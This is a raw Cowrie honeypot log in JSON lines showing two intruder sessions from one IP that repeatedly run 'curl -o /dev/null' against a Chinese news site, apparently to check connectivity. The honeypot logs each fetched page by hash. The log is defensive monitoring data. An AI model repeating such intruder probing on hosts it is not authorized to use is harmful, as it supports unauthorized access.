{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.903702Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.907331Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.920426Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.921288Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.929101Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.931606Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.935120Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.941656Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.943351Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.945284Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.947167Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.956743Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.958888Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.959764Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.965758Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.969457Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.972182Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.985240Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.986118Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:30.995313Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:30.995847Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.013274Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.018322Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.024674Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.025659Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.029974Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.030753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.066031Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.067044Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.070697Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.071484Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.106179Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.107097Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.110265Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.111229Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.144865Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.145546Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.151294Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.152138Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.171798Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.173100Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.184242Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.184997Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.189374Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.190080Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.219429Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.224566Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.225364Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.231329Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.232068Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.262701Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.263662Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.270367Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.271137Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.278166Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.296599Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.299490Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.300953Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.301887Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.308563Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.309292Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.336889Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.337986Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.347703Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.348855Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.373826Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.374747Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.393351Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.394800Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.395541Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.426291Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.426997Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.431908Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.432518Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.462890Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.464123Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.469087Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.469827Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.502621Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.504364Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.506896Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.508325Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.541505Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.542335Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.545147Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.548053Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.549178Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.555123Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.557789Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:31.567451Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:31.598984Z","src_ip":"212.227.125.160","session":"7541ed730449"}
